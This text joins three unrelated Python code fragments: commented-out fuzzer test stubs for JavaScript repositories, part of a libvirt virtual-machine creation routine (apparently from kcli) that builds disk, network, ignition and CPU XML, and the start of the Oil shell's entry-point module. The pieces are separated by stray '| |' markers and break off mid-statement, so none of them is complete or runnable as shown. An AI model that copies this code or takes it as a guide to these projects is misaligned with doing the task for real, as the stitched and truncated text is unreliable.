# path_name = os.path.join(constants.seeds_dir, 'repos', 'SocialFeed.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Sortable():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Sortable')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SpaceEngineers():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SpaceEngineers')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Sparky_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Sparky.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SpeechToText_WebSockets_Javascript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SpeechToText-WebSockets-Javascript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Sprint_Challenge__JavaScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Sprint-Challenge--JavaScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Sprint_Challenge_Applied_Javascript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Sprint-Challenge-Applied-Javascript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Starling_Framework():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Starling-Framework')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_StatusPage():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'StatusPage')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Stockfish():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Stockfish')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Streamus():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Streamus')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Strelki_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Strelki.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SublimeRubyMotionBuilder():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SublimeRubyMotionBuilder')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SublimeTextSetupWiki():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SublimeTextSetupWiki')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Switcheroo():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Switcheroo')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Syte2():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Syte2')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TOMODOkorz():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TOMODOkorz')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TableTools():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TableTools')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tangle():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tangle')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tangram_base():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tangram-base')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tangram_component():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tangram-component')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tangram2():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tangram2')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tasks():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tasks')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TemplateBinding():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TemplateBinding')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_The_complete_guide_to_modern_JavaScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'The-complete-guide-to-modern-JavaScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TheAmazingAudioEngine():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TheAmazingAudioEngine')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ThreeNodes_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ThreeNodes.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Throttle():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Throttle')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TiIconicFont():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TiIconicFont')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TimelineJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TimelineJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Titanium_Tools():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Titanium-Tools')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Todo():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Todo')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TopLevel():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TopLevel')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TouchyBP():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TouchyBP')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tracker():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tracker')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TransformJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TransformJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tuiter():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tuiter')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TypeScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TypeScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_UIWebView_TS_JavaScriptContext():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'UIWebView-TS_JavaScriptContext')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_URI_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'URI.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_UTiL():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'UTiL')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_UglifyJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'UglifyJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_UglifyJS2():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'UglifyJS2')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_UnrealEnginePython():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'UnrealEnginePython')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_V2EX_Vue():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'V2EX-Vue')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_V8():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'V8')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Validator():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Validator')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Vanilla_JavaScript_Calculator():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Vanilla-JavaScript-Calculator')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ViewerJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ViewerJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_VvvebJs():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'VvvebJs')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_WKWebViewJavascriptBridge():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'WKWebViewJavascriptBridge')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Walkable_App():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Walkable-App')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_WalletGenerator_net():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'WalletGenerator.net')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_WasAPlayer():
# path_name | |
self.disk_exists(pool, storagename):
if diskpool in volsxml:
volsxml[diskpool].append(volxml)
else:
volsxml[diskpool] = [volxml]
else:
common.pprint("Using existing disk %s..." % storagename, color='blue')
if index == 0 and diskmacosx:
macosx = True
machine = 'pc-q35-2.11'
if diskwwn is not None and diskbus == 'ide':
diskwwn = '0x%016x' % diskwwn
diskwwn = "<wwn>%s</wwn>" % diskwwn
else:
diskwwn = ''
dtype = 'block' if '/dev' in diskpath else 'file'
dsource = 'dev' if '/dev' in diskpath else 'file'
if diskpooltype in ['logical', 'zfs'] and (backing is None or backing.startswith('/dev')):
diskformat = 'raw'
disksxml = """%s<disk type='%s' device='disk'>
<driver name='qemu' type='%s'/>
<source %s='%s'/>
%s
<target dev='%s' bus='%s'/>
%s
</disk>""" % (disksxml, dtype, diskformat, dsource, diskpath, backingxml, diskdev, diskbus,
diskwwn)
netxml = ''
alias = []
guestagent = False
for index, net in enumerate(nets):
if usermode:
continue
ovs = False
macxml = ''
nettype = 'virtio'
if isinstance(net, str):
netname = net
nets[index] = {'name': netname}
elif isinstance(net, dict) and 'name' in net:
netname = net['name']
if 'mac' in nets[index]:
mac = nets[index]['mac']
macxml = "<mac address='%s'/>" % mac
if 'type' in nets[index]:
nettype = nets[index]['type']
if index == 0 and 'alias' in nets[index] and isinstance(nets[index]['alias'], list):
reservedns = True
alias = nets[index]['alias']
if 'ovs' in nets[index] and nets[index]['ovs']:
ovs = True
if 'ip' in nets[index] and index == 0:
metadata = """%s<kvirt:ip >%s</kvirt:ip>""" % (metadata, nets[index]['ip'])
if ips and len(ips) > index and ips[index] is not None and\
netmasks and len(netmasks) > index and netmasks[index] is not None and gateway is not None:
nets[index]['ip'] = ips[index]
nets[index]['netmask'] = netmasks[index]
if netname in bridges or ovs:
iftype = 'bridge'
sourcexml = "<source bridge='%s'/>" % netname
guestagent = True
if reservedns:
dnscmdhost = dns if dns is not None else self.host
dnscmd = "sed -i 's/nameserver .*/nameserver %s/' /etc/resolv.conf" % dnscmdhost
cmds = cmds[:index] + [dnscmd] + cmds[index:]
elif netname in networks:
iftype = 'network'
sourcexml = "<source network='%s'/>" % netname
else:
return {'result': 'failure', 'reason': "Invalid network %s" % netname}
ovsxml = "<virtualport type='openvswitch'/>" if ovs else ''
netxml = """%s
<interface type='%s'>
%s
%s
%s
<model type='%s'/>
</interface>""" % (netxml, iftype, macxml, sourcexml, ovsxml, nettype)
metadata = """%s
<kvirt:plan>%s</kvirt:plan>
</kvirt:info>
</metadata>""" % (metadata, plan)
if guestagent:
gcmds = []
if image is not None:
lower = image.lower()
if (lower.startswith('centos') or lower.startswith('fedora') or lower.startswith('rhel')):
gcmds.append('yum -y install qemu-guest-agent')
gcmds.append('systemctl enable qemu-guest-agent')
gcmds.append('systemctl restart qemu-guest-agent')
elif image.lower().startswith('debian'):
gcmds.append('apt-get -f install qemu-guest-agent')
elif [x for x in ubuntus if x in image.lower()]:
gcmds.append('apt-get update')
gcmds.append('apt-get -f install qemu-guest-agent')
index = 1
if image is not None and image.startswith('rhel'):
subindex = [i for i, value in enumerate(cmds) if value.startswith('subscription-manager')]
if subindex:
index = subindex.pop() + 1
cmds = cmds[:index] + gcmds + cmds[index:]
isoxml = ''
if iso is not None:
if os.path.isabs(iso):
if self.protocol == 'ssh' and self.host not in ['localhost', '127.0.0.1']:
isocheckcmd = 'ssh %s -p %s %s@%s "ls %s >/dev/null 2>&1"' % (self.identitycommand, self.port,
self.user, self.host, iso)
code = os.system(isocheckcmd)
if code != 0:
return {'result': 'failure', 'reason': "Iso %s not found" % iso}
elif not os.path.exists(iso):
return {'result': 'failure', 'reason': "Iso %s not found" % iso}
else:
if iso not in volumes:
return {'result': 'failure', 'reason': "Iso %s not found" % iso}
else:
isovolume = volumes[iso]['object']
iso = isovolume.path()
isoxml = """<disk type='file' device='cdrom'>
<driver name='qemu' type='raw'/>
<source file='%s'/>
<target dev='hdc' bus='ide'/>
<readonly/>
</disk>""" % iso
if cloudinit:
if image is not None and ('coreos' in image or image.startswith('rhcos')):
localhosts = ['localhost', '127.0.0.1']
ignition = True
ignitiondir = '/var/tmp'
k8sdir = '/var/run/secrets/kubernetes.io'
if os.path.exists("/i_am_a_container") and not os.path.exists(k8sdir):
ignitiondir = '/ignitiondir'
if not os.path.exists(ignitiondir):
msg = "You need to add -v /var/tmp:/ignitiondir to container alias"
return {'result': 'failure', 'reason': msg}
elif self.protocol == 'ssh' and self.host not in localhosts:
ignitiondir = '/tmp'
version = '3.0.0' if image.startswith('fedora-coreos') else '2.2.0'
ignitiondata = common.ignition(name=name, keys=keys, cmds=cmds, nets=nets, gateway=gateway, dns=dns,
domain=domain, reserveip=reserveip, files=files,
enableroot=enableroot, overrides=overrides, version=version, plan=plan)
with open('%s/%s.ign' % (ignitiondir, name), 'w') as ignitionfile:
ignitionfile.write(ignitiondata)
identityfile = None
if os.path.exists(os.path.expanduser("~/.kcli/id_rsa")):
identityfile = os.path.expanduser("~/.kcli/id_rsa")
elif os.path.exists(os.path.expanduser("~/.kcli/id_rsa")):
identityfile = os.path.expanduser("~/.kcli/id_rsa")
if identityfile is not None:
identitycommand = "-i %s" % identityfile
else:
identitycommand = ""
if self.protocol == 'ssh' and self.host not in localhosts:
ignitioncmd1 = 'scp %s -qP %s %s/%s.ign %s@%s:/var/tmp' % (identitycommand, self.port, ignitiondir,
name, self.user, self.host)
code = os.system(ignitioncmd1)
if code != 0:
return {'result': 'failure', 'reason': "Unable to create ignition data file in /var/tmp"}
elif image is not None and not ignition:
cloudinitiso = "%s/%s.ISO" % (default_poolpath, name)
dtype = 'block' if '/dev' in diskpath else 'file'
dsource = 'dev' if '/dev' in diskpath else 'file'
isoxml = """%s<disk type='%s' device='cdrom'>
<driver name='qemu' type='raw'/>
<source %s='%s'/>
<target dev='hdd' bus='ide'/>
<readonly/>
</disk>""" % (isoxml, dtype, dsource, cloudinitiso)
listen = '0.0.0.0' if self.host not in ['localhost', '127.0.0.1'] else '127.0.0.1'
displayxml = """<input type='tablet' bus='usb'/>
<input type='mouse' bus='ps2'/>
<graphics type='%s' port='-1' autoport='yes' listen='%s'>
<listen type='address' address='%s'/>
</graphics>
<memballoon model='virtio'/>""" % (display, listen, listen)
if cpumodel == 'host-model':
cpuxml = """<cpu mode='host-model'>
<model fallback='allow'/>"""
else:
cpuxml = """<cpu mode='custom' match='exact'>
<model fallback='allow'>%s</model>""" % cpumodel
if nested and virttype == 'kvm':
capabilities = self.conn.getCapabilities()
if 'vmx' in capabilities:
nestedfeature = 'vmx'
else:
nestedfeature = 'svm'
cpuxml = """%s<feature policy='require' name='%s'/>""" % (cpuxml, nestedfeature)
if cpuflags:
for flag in cpuflags:
if isinstance(flag, str):
if flag == 'vmx':
continue
cpuxml = """%s<feature policy='optional' name='%s'/>""" % (cpuxml, flag)
elif isinstance(flag, dict):
feature = flag.get('name')
policy = flag.get('policy', 'optional')
if feature is None:
continue
elif feature == 'vmx':
continue
elif policy in ['force', 'require', 'optional', 'disable', 'forbid']:
cpuxml = """%s<feature policy='%s' name='%s'/>""" % (cpuxml, policy, feature)
if cpuxml != '':
if memoryhotplug:
lastcpu = int(numcpus) - 1
cpuxml = "%s<numa><cell id='0' cpus='0-%s' memory='1048576' unit='KiB'/></numa></cpu>" % (cpuxml,
lastcpu)
else:
cpuxml = "%s</cpu>" % cpuxml
if macosx:
cpuxml = ""
if self.host in ['localhost', '127.0.0.1']:
serialxml = """<serial type='pty'>
<target port='0'/>
</serial>
<console type='pty'>
<target type='serial' port='0'/>
</console>"""
else:
serialxml = """ <serial type="tcp">
<source mode="bind" host="127.0.0.1" service="%s"/>
<protocol type="telnet"/>
<target port="0"/>
</serial>""" % common.get_free_port()
guestxml = """<channel type='unix'>
<source mode='bind'/>
<target type='virtio' name='org.qemu.guest_agent.0'/>
</channel>"""
if cpuhotplug:
vcpuxml = "<vcpu placement='static' current='%d'>64</vcpu>" % (numcpus)
else:
vcpuxml = "<vcpu>%d</vcpu>" % numcpus
qemuextraxml = ''
if ignition or usermode or macosx:
namespace = "xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0'"
ignitionxml = ""
if ignition:
ignitionxml = """<qemu:arg value='-fw_cfg' />
<qemu:arg value='name=opt/com.coreos/config,file=/var/tmp/%s.ign' />""" % name
usermodexml = ""
if usermode:
netmodel = 'virtio-net-pci' if not macosx else 'e1000-82545em'
usermodexml = """<qemu:arg value='-netdev'/>
<qemu:arg value='user,id=mynet.0,net=10.0.10.0/24,hostfwd=tcp::%s-:22'/>
<qemu:arg value='-device'/>
<qemu:arg value='%s,netdev=mynet.0'/>""" % (userport, netmodel)
macosxml = ""
if macosx:
osk = "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
cpuflags = "+invtsc,vmware-cpuid-freq=on,+pcid,+ssse3,+sse4.2,+popcnt,+avx,+aes,+xsave,+xsaveopt"
cpuinfo = "Penryn,kvm=on,vendor=GenuineIntel,%s,check" % cpuflags
macosxml = """<qemu:arg value='-cpu'/>
<qemu:arg value='%s'/>
<qemu:arg value='-device'/>
<qemu:arg value='isa-applesmc,osk=%s'/>
<qemu:arg value='-smbios'/>
<qemu:arg value='type=2'/>""" % (cpuinfo, osk)
qemuextraxml = """<qemu:commandline>
%s
%s
%s
</qemu:commandline>""" % (ignitionxml, usermodexml, macosxml)
sharedxml = ""
if sharedfolders:
for folder in sharedfolders:
sharedxml += "<filesystem type='mount' accessmode='passthrough'>"
sharedxml += "<source dir='%s'/><target dir='%s'/>" % (folder, os.path.basename(folder))
sharedxml += "</filesystem>"
kernelxml = ""
if kernel is not None:
if kernel.startswith('http') or kernel.startswith('ftp'):
locationdir = kernel.replace('http://', '').replace('ftp://', '').replace('/', '_')
locationdir = "%s/%s" % (default_poolpath, locationdir)
if os.path.exists(locationdir):
common.pprint("Reusing existing dir for kernel", color='blue')
else:
if self.host == 'localhost' or self.host == '127.0.0.1':
os.mkdir(locationdir)
elif self.protocol == 'ssh':
locationcmd = 'ssh %s -p %s %s@%s "mkdir %s"' % (self.identitycommand, self.port, self.user,
self.host, locationdir)
code = os.system(locationcmd)
else:
return {'result': 'failure', 'reason': "Couldn't create dir to hold kernel and initrd"}
try:
location = urlopen(kernel).readlines()
except Exception as e:
return {'result': 'failure', 'reason': e}
for line in location:
if 'init' in str(line):
p = re.compile(r'.*<a href="(.*)">\1.*')
m = p.match(str(line))
if m is not None and initrd is None:
initrdfile = m.group(1)
initrdurl = "%s/%s" % (kernel, initrdfile)
initrd = "%s/initrd" % locationdir
if self.host == 'localhost' or self.host == '127.0.0.1':
initrdcmd = "curl -Lo %s -f '%s'" % (initrd, initrdurl)
elif self.protocol == 'ssh':
initrdcmd = 'ssh %s -p %s %s@%s | |
"""
core/shell.py -- Entry point for the shell interpreter.
"""
from __future__ import print_function
import errno
import time
from _devbuild.gen import arg_types
from _devbuild.gen.option_asdl import option_i, builtin_i
from _devbuild.gen.syntax_asdl import source
from asdl import runtime
from core import alloc
from core import comp_ui
from core import dev
from core import error
from core import executor
from core import completion
from core import main_loop
from core import pyos
from core import process
from core import shell_native
from core import pyutil
from core.pyutil import stderr_line
from core import state
from core import ui
from core import util
from core.pyerror import log
unused = log
from core import vm
from frontend import args
from frontend import flag_def # side effect: flags are defined!
_ = flag_def
from frontend import flag_spec
from frontend import reader
from frontend import py_reader
from frontend import parse_lib
from oil_lang import expr_eval
from oil_lang import builtin_oil
from oil_lang import funcs_builtin
from osh import builtin_assign
from osh import builtin_comp
from osh import builtin_meta
from osh import builtin_misc
from osh import builtin_lib
from osh import builtin_printf
from osh import builtin_process
from osh import builtin_pure
from osh import cmd_eval
from osh import glob_
from osh import history
from osh import prompt
from osh import sh_expr_eval
from osh import split
from osh import word_eval
from mycpp import mylib
from pylib import os_path
import libc
import posix_ as posix
from typing import List, Dict, Optional, Any, TYPE_CHECKING
if TYPE_CHECKING:
from _devbuild.gen.runtime_asdl import Proc
def _InitDefaultCompletions(cmd_ev, complete_builtin, comp_lookup):
# type: (cmd_eval.CommandEvaluator, builtin_comp.Complete, completion.Lookup) -> None
# register builtins and words
complete_builtin.Run(shell_native.MakeBuiltinArgv(['-E', '-A', 'command']))
# register path completion
# Add -o filenames? Or should that be automatic?
complete_builtin.Run(shell_native.MakeBuiltinArgv(['-D', '-A', 'file']))
# TODO: Move this into demo/slow-completion.sh
if 1:
# Something for fun, to show off. Also: test that you don't repeatedly hit
# the file system / network / coprocess.
A1 = completion.TestAction(['foo.py', 'foo', 'bar.py'])
A2 = completion.TestAction(['m%d' % i for i in xrange(5)], delay=0.1)
C1 = completion.UserSpec([A1, A2], [], [], lambda candidate: True)
comp_lookup.RegisterName('slowc', {}, C1)
def SourceStartupFile(fd_state, rc_path, lang, parse_ctx, cmd_ev):
# type: (process.FdState, str, str, parse_lib.ParseContext, cmd_eval.CommandEvaluator) -> None
# Right now this is called when the shell is interactive. (Maybe it should
# be called on login_shel too.)
#
# Terms:
# - interactive shell: Roughly speaking, no args or -c, and isatty() is true
# for stdin and stdout.
# - login shell: Started from the top level, e.g. from init or ssh.
#
# We're not going to copy everything bash does because it's too complex, but
# for reference:
# https://www.gnu.org/software/bash/manual/bash.html#Bash-Startup-Files
# Bash also has --login.
try:
f = fd_state.Open(rc_path)
except OSError as e:
# TODO: Could warn about nonexistent explicit --rcfile?
if e.errno != errno.ENOENT:
raise # Goes to top level. Handle this better?
return
arena = parse_ctx.arena
rc_line_reader = reader.FileLineReader(f, arena)
rc_c_parser = parse_ctx.MakeOshParser(rc_line_reader)
with alloc.ctx_Location(arena, source.SourcedFile(rc_path)):
# TODO: handle status, e.g. 2 for ParseError
status = main_loop.Batch(cmd_ev, rc_c_parser, arena)
f.close()
class ShellOptHook(state.OptHook):
def __init__(self, line_input):
# type: (Any) -> None
self.line_input = line_input
def OnChange(self, opt0_array, opt_name, b):
# type: (List[bool], str, bool) -> bool
"""This method is called whenever an option is changed.
Returns success or failure.
"""
if opt_name == 'vi' or opt_name == 'emacs':
# TODO: Replace with a hook? Just like setting LANG= can have a hook.
if self.line_input:
self.line_input.parse_and_bind("set editing-mode " + opt_name);
else:
stderr_line(
"Warning: Can't set option %r because Oil wasn't built with line editing (e.g. GNU readline)", opt_name)
return False
# Invert: they are mutually exclusive!
if opt_name == 'vi':
opt0_array[option_i.emacs] = not b
elif opt_name == 'emacs':
opt0_array[option_i.vi] = not b
return True
def AddProcess(
b, # type: Dict[int, vm._Builtin]
mem, # type: state.Mem
shell_ex, # type: vm._Executor
ext_prog, # type: process.ExternalProgram
fd_state, # type: process.FdState
job_state, # type: process.JobState
waiter, # type: process.Waiter
tracer, # type: dev.Tracer
search_path, # type: state.SearchPath
errfmt # type: ui.ErrorFormatter
):
# type: (...) -> None
# Process
b[builtin_i.exec_] = builtin_process.Exec(mem, ext_prog, fd_state,
search_path, errfmt)
b[builtin_i.wait] = builtin_process.Wait(waiter, job_state, mem, tracer,
errfmt)
b[builtin_i.jobs] = builtin_process.Jobs(job_state)
b[builtin_i.fg] = builtin_process.Fg(job_state, waiter)
b[builtin_i.bg] = builtin_process.Bg(job_state)
b[builtin_i.umask] = builtin_process.Umask()
b[builtin_i.fork] = builtin_process.Fork(shell_ex)
b[builtin_i.forkwait] = builtin_process.ForkWait(shell_ex)
def AddOil(b, mem, cmd_ev, errfmt, procs, arena):
# type: (Dict[int, vm._Builtin], state.Mem, cmd_eval.CommandEvaluator, ui.ErrorFormatter, Dict[str, Proc], alloc.Arena) -> None
b[builtin_i.append] = builtin_oil.Append(mem, errfmt)
b[builtin_i.shvar] = builtin_pure.Shvar(mem, cmd_ev)
b[builtin_i.push_registers] = builtin_pure.PushRegisters(mem, cmd_ev)
b[builtin_i.write] = builtin_oil.Write(mem, errfmt)
b[builtin_i.pp] = builtin_oil.Pp(mem, errfmt, procs, arena)
b[builtin_i.use] = builtin_pure.Use(mem, errfmt)
b[builtin_i.argparse] = builtin_oil.ArgParse(mem, errfmt)
def Main(lang, arg_r, environ, login_shell, loader, line_input):
# type: (str, args.Reader, Dict[str, str], bool, pyutil._ResourceLoader, Any) -> int
"""The full shell lifecycle. Used by bin/osh and bin/oil.
Args:
lang: 'osh' or 'oil'
argv0, arg_r: command line arguments
environ: environment
login_shell: Was - on the front?
loader: to get help, version, grammar, etc.
line_input: optional GNU readline
"""
# Differences between osh and oil:
# - --help? I guess Oil has a SUPERSET of OSH options.
# - oshrc vs oilrc
# - shopt -s oil:all
# - Change the prompt in the interactive shell?
# osh-pure:
# - no oil grammar
# - no expression evaluator
# - no interactive shell, or line_input
# - no process.*
# process.{ExternalProgram,Waiter,FdState,JobState,SignalState} -- we want
# to evaluate config files without any of these
# Modules not translated yet: completion, comp_ui, builtin_comp, process
# - word evaluator
# - shouldn't glob? set -o noglob? or hard failure?
# - ~ shouldn't read from the file system
# - I guess it can just be the HOME=HOME?
# Builtin:
# shellvm -c 'echo hi'
# shellvm <<< 'echo hi'
argv0 = arg_r.Peek()
assert argv0 is not None
arg_r.Next()
assert lang in ('osh', 'oil'), lang
try:
attrs = flag_spec.ParseMore('main', arg_r)
except error.Usage as e:
stderr_line('osh usage error: %s', e.msg)
return 2
flag = arg_types.main(attrs.attrs)
arena = alloc.Arena()
errfmt = ui.ErrorFormatter(arena)
help_builtin = builtin_misc.Help(loader, errfmt)
if flag.help:
help_builtin.Run(shell_native.MakeBuiltinArgv(['%s-usage' % lang]))
return 0
if flag.version:
# OSH version is the only binary in Oil right now, so it's all one version.
pyutil.ShowAppVersion('Oil', loader)
return 0
no_str = None # type: str
debug_stack = [] # type: List[state.DebugFrame]
if arg_r.AtEnd():
dollar0 = argv0
else:
dollar0 = arg_r.Peek() # the script name, or the arg after -c
# Copy quirky bash behavior.
frame0 = state.DebugFrame(dollar0, 'main', no_str, state.LINE_ZERO, 0, 0)
debug_stack.append(frame0)
# Copy quirky bash behavior.
frame1 = state.DebugFrame(no_str, no_str, no_str, runtime.NO_SPID, 0, 0)
debug_stack.append(frame1)
script_name = arg_r.Peek() # type: Optional[str]
arg_r.Next()
mem = state.Mem(dollar0, arg_r.Rest(), arena, debug_stack)
opt_hook = ShellOptHook(line_input)
# Note: only MutableOpts needs mem, so it's not a true circular dep.
parse_opts, exec_opts, mutable_opts = state.MakeOpts(mem, opt_hook)
mem.exec_opts = exec_opts # circular dep
mutable_opts.Init()
version_str = pyutil.GetVersion(loader)
state.InitMem(mem, environ, version_str)
funcs_builtin.Init(mem)
procs = {} # type: Dict[str, Proc]
if attrs.show_options: # special case: sh -o
mutable_opts.ShowOptions([])
return 0
# Set these BEFORE processing flags, so they can be overridden.
if lang == 'oil':
mutable_opts.SetShoptOption('oil:all', True)
builtin_pure.SetShellOpts(mutable_opts, attrs.opt_changes, attrs.shopt_changes)
# feedback between runtime and parser
aliases = {} # type: Dict[str, str]
oil_grammar = pyutil.LoadOilGrammar(loader)
if flag.one_pass_parse and not exec_opts.noexec():
raise error.Usage('--one-pass-parse requires noexec (-n)')
parse_ctx = parse_lib.ParseContext(arena, parse_opts, aliases, oil_grammar)
parse_ctx.Init_OnePassParse(flag.one_pass_parse)
# Three ParseContext instances SHARE aliases.
comp_arena = alloc.Arena()
comp_arena.PushSource(source.Unused('completion'))
trail1 = parse_lib.Trail()
# one_pass_parse needs to be turned on to complete inside backticks. TODO:
# fix the issue where ` gets erased because it's not part of
# set_completer_delims().
comp_ctx = parse_lib.ParseContext(comp_arena, parse_opts, aliases,
oil_grammar)
comp_ctx.Init_Trail(trail1)
comp_ctx.Init_OnePassParse(True)
hist_arena = alloc.Arena()
hist_arena.PushSource(source.Unused('history'))
trail2 = parse_lib.Trail()
hist_ctx = parse_lib.ParseContext(hist_arena, parse_opts, aliases,
oil_grammar)
hist_ctx.Init_Trail(trail2)
# Deps helps manages dependencies. These dependencies are circular:
# - cmd_ev and word_ev, arith_ev -- for command sub, arith sub
# - arith_ev and word_ev -- for $(( ${a} )) and $x$(( 1 ))
# - cmd_ev and builtins (which execute code, like eval)
# - prompt_ev needs word_ev for $PS1, which needs prompt_ev for @P
cmd_deps = cmd_eval.Deps()
cmd_deps.mutable_opts = mutable_opts
# TODO: In general, cmd_deps are shared between the mutually recursive
# evaluators. Some of the four below are only shared between a builtin and
